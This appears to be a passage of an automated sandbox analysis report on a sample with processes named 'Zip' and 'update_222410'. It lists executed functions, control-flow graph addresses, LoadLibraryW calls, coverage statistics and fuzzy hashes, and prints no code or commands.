                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: afcd0f191d5619b0c5bd4cca03722f237d89173b9c53fe191ad8765e8ae82b61
                                                                                                                • Instruction ID: 6a72541ddd0d209082b18004957eff094da641453530e8585a8d0c00664d0e48
                                                                                                                • Opcode Fuzzy Hash: afcd0f191d5619b0c5bd4cca03722f237d89173b9c53fe191ad8765e8ae82b61
                                                                                                                • Instruction Fuzzy Hash: 2FE0B631D4952C8ADBA4EA2498445EDB370EB46611F5011E6D10DE2551DE31AA958A44
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:11.6%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:0%
                                                                                                                Total number of Nodes:3
                                                                                                                Total number of Limit Nodes:0
                                                                                                                execution_graph 12069 7ff9a63c9038 12070 7ff9a63c9041 LoadLibraryW 12069->12070 12072 7ff9a63c912d 12070->12072

                                                                                                                Executed Functions

                                                                                                                Function 00007FF9A63C9038 Relevance: 1.6, APIs: 1, Instructions: 140libraryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 240 7ff9a63c9038-7ff9a63c90ef 249 7ff9a63c90f1-7ff9a63c90f6 240->249 250 7ff9a63c90f9-7ff9a63c912b LoadLibraryW 240->250 249->250 251 7ff9a63c9133-7ff9a63c915a 250->251 252 7ff9a63c912d 250->252 252->251
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.382648126.00007FF9A63C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A63C0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_7ff9a63c0000_Zip.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID:
                                                                                                                • API String ID: 1029625771-0
                                                                                                                • Opcode ID: 7bb425e17b1f56ac284831e947b2bdd5338ec8b1a704215456ce8bff39c13bd4
                                                                                                                • Instruction ID: 8b43da10ff0c8d023c1950c2fc11f2aedd6ed13cea0c0f8c983041a308f2df9d
                                                                                                                • Opcode Fuzzy Hash: 7bb425e17b1f56ac284831e947b2bdd5338ec8b1a704215456ce8bff39c13bd4
                                                                                                                • Instruction Fuzzy Hash: D5410672D0DE9C4FEB54DF6CA8097A9BFE0FF95710F04416ED08DC3186DA60A84A8781
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00007FF9A629F051 Relevance: .1, Instructions: 133COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.382171332.00007FF9A629D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A629D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_7ff9a629d000_Zip.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0383eba0d02ee1f7ca47570f15d2dff82162169fd0b211b483fc972c493ea1bc
                                                                                                                • Instruction ID: dae28480d88006b92f8dec50d2476961344eb655b94c3cbf806f7969069a44cb
                                                                                                                • Opcode Fuzzy Hash: 0383eba0d02ee1f7ca47570f15d2dff82162169fd0b211b483fc972c493ea1bc
                                                                                                                • Instruction Fuzzy Hash: EA41123140EBC44FD796CB389846A623FF0EF57320B1506DFD088CB1A7D665A84AC7A2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:14%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:0%
                                                                                                                Total number of Nodes:3
                                                                                                                Total number of Limit Nodes:0
                                                                                                                execution_graph 9269 7ff9a63b8c44 9270 7ff9a63b8c4d LoadLibraryW 9269->9270 9272 7ff9a63b8cfd 9270->9272

                                                                                                                Executed Functions

                                                                                                                Function 00007FF9A63B8C44 Relevance: 1.6, APIs: 1, Instructions: 110libraryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 573 7ff9a63b8c44-7ff9a63b8c4b 574 7ff9a63b8c56-7ff9a63b8cbf 573->574 575 7ff9a63b8c4d-7ff9a63b8c55 573->575 578 7ff9a63b8cc1-7ff9a63b8cc6 574->578 579 7ff9a63b8cc9-7ff9a63b8cfb LoadLibraryW 574->579 575->574 578->579 580 7ff9a63b8d03-7ff9a63b8d2a 579->580 581 7ff9a63b8cfd 579->581 581->580
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.411918693.00007FF9A63B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A63B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_7ff9a63b0000_update_222410.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID:
                                                                                                                • API String ID: 1029625771-0
                                                                                                                • Opcode ID: bb90c4c178eaa11098754b3f20a05810b123dc551ee7be4062247b6e2478268c
                                                                                                                • Instruction ID: a1a3a45c4ed47f35b5138a94d2584aab12748afd59b249bf3acfc4e9f95e1b6b
                                                                                                                • Opcode Fuzzy Hash: bb90c4c178eaa11098754b3f20a05810b123dc551ee7be4062247b6e2478268c
                                                                                                                • Instruction Fuzzy Hash: 0C31C43190CA4C8FDB59DB9C94497E9BBE1EB55711F04422BD04DD3252CB74A4058B91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00007FF9A628F2F0 Relevance: .1, Instructions: 133COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.411354344.00007FF9A628D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A628D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_7ff9a628d000_update_222410.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 282f3c1c49b40ffc9b189f82d8803c0e9df7458be2e68ce71f5762f09b9b867e
                                                                                                                • Instruction ID: e20370d51809a5cbed22bff90c271d39389066a7a8d602daa91ea349475fceea
                                                                                                                • Opcode Fuzzy Hash: 282f3c1c49b40ffc9b189f82d8803c0e9df7458be2e68ce71f5762f09b9b867e
                                                                                                                • Instruction Fuzzy Hash: DA41E17040DBC45FD75ACB289845AA23FF0EF56360B1505DFD088CB1A7D665BC4AC7A2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:17.6%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:0%
                                                                                                                Total number of Nodes:3
                                                                                                                Total number of Limit Nodes:0
                                                                                                                execution_graph 7598 7ff9a63b8c44 7599 7ff9a63b8c4d LoadLibraryW 7598->7599 7601 7ff9a63b8cfd 7599->7601

                                                                                                                Executed Functions

                                                                                                                Function 00007FF9A63BEB81 Relevance: 3.3, Strings: 2, Instructions: 824COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 0 7ff9a63beb81-7ff9a63beb85 1 7ff9a63beb87 0->1 2 7ff9a63beb8d 0->2 1->2 3 7ff9a63beb90-7ff9a63beba1 2->3 4 7ff9a63beb8f 2->4 5 7ff9a63beba4-7ff9a63bec58 call 7ff9a63bdd10 3->5 6 7ff9a63beba3 3->6 4->3 12 7ff9a63bec5a-7ff9a63bec63 5->12 13 7ff9a63bec7e-7ff9a63bec87 5->13 6->5 12->13 15 7ff9a63bec89-7ff9a63bec99 13->15 16 7ff9a63becae-7ff9a63becb1 13->16 15->16 18 7ff9a63bed04-7ff9a63bed07 16->18 19 7ff9a63becb3-7ff9a63becb8 16->19 20 7ff9a63bed49-7ff9a63bed4c 18->20 21 7ff9a63bed09-7ff9a63bed19 call 7ff9a63be9d0 18->21 22 7ff9a63becea-7ff9a63bed03 19->22 23 7ff9a63becba-7ff9a63becd1 19->23 26 7ff9a63bed4e-7ff9a63bed5b call 7ff9a63be8e0 20->26 27 7ff9a63bed5d-7ff9a63bed66 20->27 21->20 34 7ff9a63bed1b-7ff9a63bed44 21->34 22->18 23->22 32 7ff9a63becd3-7ff9a63becd6 23->32 26->27 35 7ff9a63bed68-7ff9a63bed91 26->35 27->35 36 7ff9a63becdc-7ff9a63bece5 32->36 37 7ff9a63bf0be-7ff9a63bf0d9 32->37 46 7ff9a63bf0a7-7ff9a63bf0bd 34->46 45 7ff9a63bed97-7ff9a63bed98 35->45 38 7ff9a63befe3-7ff9a63beff5 36->38 47 7ff9a63bf0e0-7ff9a63bf14d 37->47 48 7ff9a63bed9f-7ff9a63beda1 45->48 76 7ff9a63bf154-7ff9a63bf180 47->76 49 7ff9a63befa7-7ff9a63befaa 48->49 50 7ff9a63beda7-7ff9a63bedbb 48->50 53 7ff9a63beff6-7ff9a63bf024 49->53 54 7ff9a63befac-7ff9a63befc8 49->54 59 7ff9a63bedc1-7ff9a63bedd7 50->59 60 7ff9a63bf26a-7ff9a63bf29a 50->60 68 7ff9a63bf077-7ff9a63bf07c 53->68 69 7ff9a63bf026-7ff9a63bf02a 53->69 54->53 73 7ff9a63befca-7ff9a63befd4 54->73 64 7ff9a63bee0b-7ff9a63bee1f 59->64 65 7ff9a63bedd9-7ff9a63bedeb 59->65 70 7ff9a63bf2a1-7ff9a63bf2c6 60->70 71 7ff9a63bf29c 60->71 64->60 84 7ff9a63bee25-7ff9a63bee36 call 7ff9a63be8e0 64->84 65->64 75 7ff9a63beded-7ff9a63bedf7 65->75 78 7ff9a63bf083-7ff9a63bf098 68->78 74 7ff9a63bf02d-7ff9a63bf03e 69->74 71->70 73->76 77 7ff9a63befda-7ff9a63befe1 73->77 81 7ff9a63bf040-7ff9a63bf055 74->81 75->47 82 7ff9a63bedfd-7ff9a63bee06 75->82 97 7ff9a63bf182-7ff9a63bf1ef 76->97 98 7ff9a63bf1f6-7ff9a63bf240 76->98 77->38 87 7ff9a63bf059-7ff9a63bf05e 81->87 82->38 94 7ff9a63bee38-7ff9a63bee55 84->94 95 7ff9a63bee5a-7ff9a63beedb 84->95 88 7ff9a63bf099-7ff9a63bf0a4 87->88 89 7ff9a63bf060-7ff9a63bf06f 87->89 88->46 89->87 99 7ff9a63bf071-7ff9a63bf075 89->99 108 7ff9a63beedd-7ff9a63beee0 94->108 95->108 97->98 98->60 99->68 99->74 108->49 110 7ff9a63beee6-7ff9a63beef3 108->110 113 7ff9a63beef6-7ff9a63bef0b 110->113 116 7ff9a63bef0d-7ff9a63bef11 113->116 119 7ff9a63bef83-7ff9a63bef8f 116->119 120 7ff9a63bef13-7ff9a63bef1a 116->120 119->78 122 7ff9a63bef1c-7ff9a63bef51 call 7ff9a63bdd10 120->122 134 7ff9a63bef94-7ff9a63befa2 122->134 135 7ff9a63bef53-7ff9a63bef64 122->135 134->46 137 7ff9a63bef66-7ff9a63bef7b 135->137 139 7ff9a63bef7d-7ff9a63bef81 137->139 139->119 139->122
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.416476703.00007FF9A63BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A63BD000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff9a63bd000_update_222410.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: `_I$7__L
                                                                                                                • API String ID: 0-571641856
                                                                                                                • Opcode ID: 59b30e201a34ddbe8c40e18d2ef727448aa8a8645cff325377a1c04b2e6ed1e1
                                                                                                                • Instruction ID: 71b8ae87c13c5bd66886819ce12fb0a4a3e964d68199355a03b36d3b7700dae6
                                                                                                                • Opcode Fuzzy Hash: 59b30e201a34ddbe8c40e18d2ef727448aa8a8645cff325377a1c04b2e6ed1e1
                                                                                                                • Instruction Fuzzy Hash: 9C320531A1DE094FEB58EB2C98597B877D1EF99B50F0441BEE44EC7292DE64BC028781
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00007FF9A63BD68D Relevance: 1.2, Instructions: 1226COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.416476703.00007FF9A63BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A63BD000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff9a63bd000_update_222410.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6cf4fded7b2a08a94d10d539b3dc374b19f4e348df1faabd3734531d50621f97
                                                                                                                • Instruction ID: 0c9705c561a1770e27bb86b105920a36077b3b9ab1fe36419814b91d65864ffc
                                                                                                                • Opcode Fuzzy Hash: 6cf4fded7b2a08a94d10d539b3dc374b19f4e348df1faabd3734531d50621f97
                                                                                                                • Instruction Fuzzy Hash: E4720321A1DE4A4FF758EB28A4597B837D1EFD5B51F0444BAE49DCB2C2DD68B8038381
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00007FF9A63C2CF6 Relevance: .5, Instructions: 473COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1807 7ff9a63c2cf6-7ff9a63c2d03 1808 7ff9a63c2d05-7ff9a63c2d0d 1807->1808 1809 7ff9a63c2d0e-7ff9a63c2dd7 1807->1809 1808->1809 1813 7ff9a63c2e43 1809->1813 1814 7ff9a63c2dd9-7ff9a63c2de2 1809->1814 1815 7ff9a63c2e45-7ff9a63c2e6a 1813->1815 1814->1813 1816 7ff9a63c2de4-7ff9a63c2df0 1814->1816 1823 7ff9a63c2ed6 1815->1823 1824 7ff9a63c2e6c-7ff9a63c2e75 1815->1824 1817 7ff9a63c2df2-7ff9a63c2e04 1816->1817 1818 7ff9a63c2e29-7ff9a63c2e41 1816->1818 1820 7ff9a63c2e08-7ff9a63c2e1b 1817->1820 1821 7ff9a63c2e06 1817->1821 1818->1815 1820->1820 1822 7ff9a63c2e1d-7ff9a63c2e25 1820->1822 1821->1820 1822->1818 1826 7ff9a63c2ed8-7ff9a63c2f80 1823->1826 1824->1823 1825 7ff9a63c2e77-7ff9a63c2e83 1824->1825 1827 7ff9a63c2e85-7ff9a63c2e97 1825->1827 1828 7ff9a63c2ebc-7ff9a63c2ed4 1825->1828 1837 7ff9a63c2f82-7ff9a63c2f8c 1826->1837 1838 7ff9a63c2fee 1826->1838 1830 7ff9a63c2e9b-7ff9a63c2eae 1827->1830 1831 7ff9a63c2e99 1827->1831 1828->1826 1830->1830 1833 7ff9a63c2eb0-7ff9a63c2eb8 1830->1833 1831->1830 1833->1828 1837->1838 1840 7ff9a63c2f8e-7ff9a63c2f9b 1837->1840 1839 7ff9a63c2ff0-7ff9a63c3019 1838->1839 1846 7ff9a63c3083 1839->1846 1847 7ff9a63c301b-7ff9a63c3026 1839->1847 1841 7ff9a63c2fd4-7ff9a63c2fec 1840->1841 1842 7ff9a63c2f9d-7ff9a63c2faf 1840->1842 1841->1839 1844 7ff9a63c2fb3-7ff9a63c2fc6 1842->1844 1845 7ff9a63c2fb1 1842->1845 1844->1844 1848 7ff9a63c2fc8-7ff9a63c2fd0 1844->1848 1845->1844 1850 7ff9a63c3085-7ff9a63c3116 1846->1850 1847->1846 1849 7ff9a63c3028-7ff9a63c3036 1847->1849 1848->1841 1851 7ff9a63c3038-7ff9a63c304a 1849->1851 1852 7ff9a63c306f-7ff9a63c3081 1849->1852 1858 7ff9a63c311c-7ff9a63c312b 1850->1858 1853 7ff9a63c304c 1851->1853 1854 7ff9a63c304e-7ff9a63c3061 1851->1854 1852->1850 1853->1854 1854->1854 1856 7ff9a63c3063-7ff9a63c306b 1854->1856 1856->1852 1859 7ff9a63c3133-7ff9a63c3198 call 7ff9a63c31b4 1858->1859 1860 7ff9a63c312d 1858->1860 1867 7ff9a63c319a 1859->1867 1868 7ff9a63c319f-7ff9a63c31b3 1859->1868 1860->1859 1867->1868
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.416503201.00007FF9A63C2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A63C2000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff9a63c2000_update_222410.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 3000fd84722aeea1c6a06ed93a451cca52eb56c1d21244bd9de19beb4388f30f
                                                                                                                • Instruction ID: ea22de857ed491b8924c45000f64d3c0f6764582987230e5166d9645ae5a18e6
                                                                                                                • Opcode Fuzzy Hash: 3000fd84722aeea1c6a06ed93a451cca52eb56c1d21244bd9de19beb4388f30f
                                                                                                                • Instruction Fuzzy Hash: ADF1C430909A8D8FEBA8DF28D8457E937E1FF55710F04826EE85DC7291CF74A9458B82
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00007FF9A63C3AA2 Relevance: .5, Instructions: 459COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.416503201.00007FF9A63C2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A63C2000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff9a63c2000_update_222410.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9bf50e1bb30892d5b23af3308de7c2adbbd27a638ddccfec873cbb4648e514b4
                                                                                                                • Instruction ID: 060c9a2d9f25c63658c287c5c5aecf459793808e53229805fa7f52805b9ff84c
                                                                                                                • Opcode Fuzzy Hash: 9bf50e1bb30892d5b23af3308de7c2adbbd27a638ddccfec873cbb4648e514b4
                                                                                                                • Instruction Fuzzy Hash: 08E1B230909A8D8FEBA8DF28D8557EA77E1FF54710F04826EE85DC7291CF74A8458B81
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00007FF9A63BE28D Relevance: 1.8, Strings: 1, Instructions: 539COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 452 7ff9a63be28d-7ff9a63be297 454 7ff9a63be390-7ff9a63be3a2 452->454 455 7ff9a63be29d-7ff9a63be2b2 452->455 460 7ff9a63be3a8-7ff9a63be3bc 454->460 461 7ff9a63be560-7ff9a63be56d 454->461 458 7ff9a63be2b4-7ff9a63be2b7 455->458 459 7ff9a63be2cb-7ff9a63be309 455->459 458->459 462 7ff9a63be2b9-7ff9a63be2c9 458->462 477 7ff9a63be315-7ff9a63be321 459->477 478 7ff9a63be30b-7ff9a63be310 459->478 460->461 466 7ff9a63be3c2-7ff9a63be3d6 460->466 469 7ff9a63be573-7ff9a63be596 461->469 470 7ff9a63be5f9-7ff9a63be5fb 461->470 462->459 480 7ff9a63be70c-7ff9a63be75a 466->480 481 7ff9a63be3dc-7ff9a63be448 466->481 469->470 484 7ff9a63be598-7ff9a63be5cf 469->484 472 7ff9a63be601-7ff9a63be604 470->472 473 7ff9a63be68d-7ff9a63be70b 470->473 476 7ff9a63be606-7ff9a63be618 472->476 473->480 477->454 478->476 500 7ff9a63be7b6-7ff9a63be7c0 480->500 501 7ff9a63be75c-7ff9a63be76e 480->501 481->470 516 7ff9a63be44e-7ff9a63be485 481->516 502 7ff9a63be5d1-7ff9a63be5d6 484->502 503 7ff9a63be5d8-7ff9a63be5dc 484->503 501->500 507 7ff9a63be770-7ff9a63be782 501->507 502->476 508 7ff9a63be5e3-7ff9a63be5f8 503->508 507->500 512 7ff9a63be784-7ff9a63be796 507->512 512->500 517 7ff9a63be798-7ff9a63be7a3 512->517 525 7ff9a63be48e-7ff9a63be495 516->525 526 7ff9a63be49c-7ff9a63be49e 525->526 527 7ff9a63be4e4-7ff9a63be4f9 526->527 528 7ff9a63be4a0-7ff9a63be4ab 526->528 534 7ff9a63be4fb-7ff9a63be4fd 527->534 535 7ff9a63be50d-7ff9a63be528 527->535 531 7ff9a63be4c0-7ff9a63be4c3 528->531 532 7ff9a63be4ad-7ff9a63be4c3 528->532 531->527 533 7ff9a63be4c5-7ff9a63be4e2 531->533 532->527 532->533 545 7ff9a63be52a-7ff9a63be544 533->545 536 7ff9a63be503-7ff9a63be508 534->536 537 7ff9a63be619-7ff9a63be663 534->537 535->545 536->476 537->473 548 7ff9a63be546-7ff9a63be54b 545->548 549 7ff9a63be550-7ff9a63be55b 545->549 548->476 549->508
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.416476703.00007FF9A63BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A63BD000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff9a63bd000_update_222410.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: V__H
                                                                                                                • API String ID: 0-3991301846
                                                                                                                • Opcode ID: 4c06c822c6a4c8ceff41a35a8a9b5523db1dac2f638f2d5819ba4b0148ea9708
                                                                                                                • Instruction ID: d335334d47b9485c72146125d8d4c3a2968cbf22154d5a192973a3cedcda6283
                                                                                                                • Opcode Fuzzy Hash: 4c06c822c6a4c8ceff41a35a8a9b5523db1dac2f638f2d5819ba4b0148ea9708
                                                                                                                • Instruction Fuzzy Hash: 8FE1D321B1DE0A4FF698E72CA45937877C2EFD9B51B0444BAE48DC7293DE58BC424781
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00007FF9A63B8C44 Relevance: 1.6, APIs: 1, Instructions: 114libraryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 554 7ff9a63b8c44-7ff9a63b8c4b 555 7ff9a63b8c56-7ff9a63b8cbf 554->555 556 7ff9a63b8c4d-7ff9a63b8c55 554->556 559 7ff9a63b8cc1-7ff9a63b8cc6 555->559 560 7ff9a63b8cc9-7ff9a63b8cfb LoadLibraryW 555->560 556->555 559->560 561 7ff9a63b8d03-7ff9a63b8d2a 560->561 562 7ff9a63b8cfd 560->562 562->561
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.416452825.00007FF9A63B8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A63B8000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff9a63b8000_update_222410.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID:
                                                                                                                • API String ID: 1029625771-0
                                                                                                                • Opcode ID: a95f19e41a624211508c1f1111f64d07be7e7f444921a5e322f4a97da7afb662
                                                                                                                • Instruction ID: 9aa494613f52b9d54866f15746a352bee121d00fda7d1073f3251b323f55cfe6
                                                                                                                • Opcode Fuzzy Hash: a95f19e41a624211508c1f1111f64d07be7e7f444921a5e322f4a97da7afb662
                                                                                                                • Instruction Fuzzy Hash: B231C47190CA4C8FDB59DB9C9849BE9BBE1EF55720F04422BD04DD3252DBB4A4068B91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00007FF9A63B34B8 Relevance: 1.5, Strings: 1, Instructions: 215COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.416429451.00007FF9A63B3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A63B3000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff9a63b3000_update_222410.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: \
                                                                                                                • API String ID: 0-2967466578
                                                                                                                • Opcode ID: e3816857329f5d6469e02b901f9f5c7de3df458b16fc66d75e5c579616b38a8c
                                                                                                                • Instruction ID: 6ed26fc4a8a86bc28aa1c0d693993e6c03b59ec2e1877d664bb402881d11f175
                                                                                                                • Opcode Fuzzy Hash: e3816857329f5d6469e02b901f9f5c7de3df458b16fc66d75e5c579616b38a8c
                                                                                                                • Instruction Fuzzy Hash: F4611330A0DA555AF758D728805A33A76D1EFD6715F10443EF4DEC22C7DEA9BC434286
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00007FF9A63B0BCD Relevance: 1.3, Strings: 1, Instructions: 74COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 655 7ff9a63b0bcd-7ff9a63b0be9 656 7ff9a63b0beb 655->656 657 7ff9a63b0bec-7ff9a63b0c2a 655->657 656->657 658 7ff9a63b0c31-7ff9a63b0c5a call 7ff9a63b00c8 call 7ff9a63b0120 657->658 659 7ff9a63b0c2c 657->659 664 7ff9a63b0c61-7ff9a63b0c6b 658->664 659->658
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.416411186.00007FF9A63B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A63B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff9a63b0000_update_222410.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: KA`_^
                                                                                                                • API String ID: 0-3122099982
                                                                                                                • Opcode ID: f0105a867c5435f2db09bf9a1b61270cab7f247410719604b753bdb50aca8a8a
                                                                                                                • Instruction ID: 5276f42a0a48221215407770193bfd04b015c8dd3705ef51ca049119125c7d68
                                                                                                                • Opcode Fuzzy Hash: f0105a867c5435f2db09bf9a1b61270cab7f247410719604b753bdb50aca8a8a
                                                                                                                • Instruction Fuzzy Hash: 3311E631C0D68D4FDB52DB7498156EABFB0EF8A310F0504BAE098E3192CB79A452C751
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00007FF9A63C4200 Relevance: 1.1, Instructions: 1060COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 903 7ff9a63c4200-7ff9a63c4207 904 7ff9a63c4212-7ff9a63c4219 903->904 905 7ff9a63c4209-7ff9a63c4211 903->905 906 7ff9a63c426c-7ff9a63c4272 904->906 907 7ff9a63c421b-7ff9a63c422c 904->907 905->904 909 7ff9a63c4276-7ff9a63c4307 906->909 907->909 910 7ff9a63c422e-7ff9a63c4256 907->910 922 7ff9a63c4368-7ff9a63c4436 909->922 923 7ff9a63c4309-7ff9a63c434f 909->923 911 7ff9a63c4258 910->911 912 7ff9a63c425d-7ff9a63c426b 910->912 911->912 912->906 939 7ff9a63c4438-7ff9a63c4496 922->939 940 7ff9a63c4497-7ff9a63c4a93 922->940 931 7ff9a63c4357-7ff9a63c4367 923->931 931->922 939->940 1008 7ff9a63c4aa5-7ff9a63c4aad 940->1008 1009 7ff9a63c4a95-7ff9a63c4a9c 940->1009 1010 7ff9a63c4aae-7ff9a63c4cbe 1008->1010 1009->1010 1011 7ff9a63c4a9e 1009->1011 1033 7ff9a63c4cc5-7ff9a63c4cdb 1010->1033 1011->1008
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.416503201.00007FF9A63C2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A63C2000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff9a63c2000_update_222410.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 506df459a4e08a4cec5b650561ae88d3e90da28830f5901f63970c7cf200e32c
                                                                                                                • Instruction ID: 0f7d658ffe2b6f4f4af74be238495d6312309ef90ee7e8839be671093396ecfc
                                                                                                                • Opcode Fuzzy Hash: 506df459a4e08a4cec5b650561ae88d3e90da28830f5901f63970c7cf200e32c
                                                                                                                • Instruction Fuzzy Hash: 6D82AF34A08A5D8FDB94EF28D888BA977F1FF69301F5144A5E41DD72A6CA75EC81CB00
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00007FF9A63C5C18 Relevance: 1.0, Instructions: 1015COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
